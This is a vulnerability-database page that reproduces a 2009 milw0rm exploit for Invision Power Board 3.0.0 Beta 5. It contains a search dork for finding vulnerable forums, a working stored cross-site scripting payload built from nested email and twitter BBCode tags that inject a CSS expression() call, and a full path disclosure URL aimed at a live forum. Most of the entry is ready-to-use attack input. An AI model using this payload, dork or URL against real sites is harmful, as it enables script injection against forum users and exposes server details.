Invision Power Board (IP.Board) 3.0.0b5 - Active Cross-Site Scripting / Full Path Disclosure

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057749 漏洞类型
发布时间 2009-04-27 更新时间 2009-04-27
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/8538
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
================================================================================

Found : brain[pillow]
Dork  : "Powered By IP.Board 3.0.0 Beta 5"
Visit : brainpillow.cc, forum.antichat.ru, raz0r.name
Greetz: slider, halkfild, m0nzt3r, c411k, ettee
Mail  : brainpillow@gmail.com
Note: works on IE 6,7,8. maybe all betas are vulnerable and it is possible to tune the xss for FF 2.0 too  ;) 

================================================================================

        Active XSS in message body or signature:

[email]qwe@[twitter]dodo style=`top:expr/*
        */ession/*bypassed*/(alert(/yahoo/))`do[/twitter]qwe.com[/email]

================================================================================

        Path disclosure:

http://forums.invisionpower.com/index.php?app=core&module=ajax&section=register&do=check-display-name&name[]=

================================================================================

# milw0rm.com [2009-04-27]